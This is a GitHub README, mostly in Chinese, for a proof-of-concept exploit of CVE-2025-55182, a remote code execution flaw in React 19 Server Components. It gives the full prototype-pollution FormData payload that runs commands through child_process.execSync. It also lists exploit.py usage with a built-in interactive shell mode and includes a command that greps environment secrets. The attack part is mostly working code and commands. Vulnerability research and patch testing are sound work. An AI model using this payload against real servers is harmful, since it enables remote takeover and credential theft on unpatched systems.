joaovicdev/EXPLOIT-CVE-2025-55182
GitHub: joaovicdev/EXPLOIT-CVE-2025-55182
CVE-2025-55182 的概念验证工具,通过构造恶意 FormData 载荷实现对 React 19.x 服务器组件的远程代码执行。
Stars: 0 | Forks: 0
# CVE-2025-55182 概念验证


## 概述
**CVE-2025-55182 (React2Shell)** 的实际演示——React Server Components 中的关键 RCE 漏洞。
## 漏洞详情
- **CVE ID**: CVE-2025-55182
- **类型**: 通过原型污染实现远程代码执行
- **CVSS**: 9.8(严重)
- **受影响版本**: React 19.0.0、19.1.0、19.1.1、19.2.0
### 攻击向量
React Server Components 不安全地反序列化 FormData。精心构造的 multipart 字段会触发原型污染,并通过 `child_process.execSync` 执行任意代码。
## 快速设置
```
npm install
pip3 install requests
npm run dev
```
应用程序运行在:**http://localhost:3000**
## 利用方法
### 基本用法
```
python3 exploit.py -c "whoami"
```
### 命令示例
```
python3 exploit.py -c "whoami"
python3 exploit.py -c "pwd"
python3 exploit.py -c "ls -la"
python3 exploit.py -c "cat package.json"
python3 exploit.py -c "env | grep SECRET"
```
### 交互模式
```
python3 exploit.py -i
```
```
> whoami
COMMAND RESULT:
your-username
============================================================
> pwd
COMMAND RESULT:
/path/to/project
============================================================
> exit
```
## 工作原理
### 载荷结构
```
{
"then": "$1:__proto__:then",
"status": "resolved_model",
"reason": -1,
"value": "{\"then\":\"$B1337\"}",
"_response": {
"_prefix": "var res=process.mainModule.require('child_process').execSync('CMD',{'timeout':5000}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${res}`});",
"_chunks": "$Q2",
"_formData": {"get": "$1:constructor:constructor"}
}
}
```
## 测试
### 终端 1:启动服务器
```
npm run dev
```
### 终端 2:运行漏洞利用
```
python3 exploit.py -c "whoami"
```
### 详细模式
```
python3 exploit.py -c "whoami" -v
```
显示完整的载荷结构和服务器响应
## 参考资料
- [CVE-2025-55182 - NVD](https://nvd.nist.gov/vuln/detail/CVE-2025-55182)
- [React 安全](https://github.com/facebook/react/security)
- [OWASP 反序列化](https://owasp.org/www-community/vulnerabilities/Deserialization_of_untrusted_data)
**作者:Guaxinim** | 网络安全研究
标签:CISA项目, CVE, CVSS, Exploit, FormData, GNU通用公共许可证, HTTP工具, MITM代理, Node.js, PoC, Prototype Pollution, Python, RCE, React, React Server Components, Syscalls, 事件响应, 代码生成, 原型污染, 恶意Payload, 数字签名, 数据可视化, 数据展示, 无后门, 无线安全, 暴力破解, 渗透测试工具, 漏洞复现, 红队, 编程工具, 网络安全, 远程代码执行, 逆向工具, 隐私保护